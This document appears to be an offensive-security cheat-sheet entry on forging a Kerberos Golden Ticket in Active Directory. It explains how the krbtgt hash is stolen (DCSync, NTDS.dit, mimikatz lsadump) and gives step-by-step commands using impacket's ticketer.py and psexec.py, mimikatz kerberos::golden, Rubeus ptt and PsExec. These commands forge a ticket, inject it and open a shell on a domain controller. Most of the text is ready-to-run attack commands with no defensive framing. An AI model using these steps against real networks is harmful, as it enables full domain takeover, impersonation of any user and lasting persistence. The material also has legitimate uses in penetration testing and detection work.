7. Golden ticket
- same idea as a Silver Ticket, but forged with the key of the krbtgt account instead of a service account's key
- craft a TGT using the NTLM hash (or AES key) of the krbtgt AD account; the KDC accepts it as genuine because it is encrypted with the KDC's own key
- allows access to any machine/service in the domain as any user (even a non-existent one, since the PAC is attacker-controlled), and stays valid until the krbtgt password is reset twice
- hash obtained from the NTDS.dit file of any DC, via DCSync (needs replication rights), or from LSASS on a DC (e.g. mimikatz lsadump::lsa /inject /name:krbtgt)
Tools: impacket’s ticketer.py & psexec.py (Linux), mimikatz & Rubeus (Windows)
Linux
ticketer.py -nthash HASH -domain-sid SID -domain DOMAIN USERNAME    (writes USERNAME.ccache)
export KRB5CCNAME=USERNAME.ccache
psexec.py DOMAIN/USERNAME@TARGET_FQDN -k -no-pass
Note: impacket takes DOMAIN/USER (forward slash). Kerberos needs the target's hostname, not an IP (add it to /etc/hosts or pass -dc-ip), and the clock skew to the DC must be under 5 minutes.
Windows
.\mimikatz.exe
kerberos::golden /domain:DOMAIN /sid:SID /krbtgt:HASH /user:USERNAME    (/rc4:HASH is accepted as an alias; writes ticket.kirbi)
kerberos::ptt TICKET.kirbi    (or add /ptt to the golden command to forge and inject in one step)
or use Rubeus to inject the same ticket
.\Rubeus.exe ptt /ticket:TICKET.kirbi
klist    (confirm the forged TGT is in the session)
.\PsExec.exe -accepteula \\DC_HOSTNAME cmd    (hostname, not IP, so Kerberos is used instead of NTLM)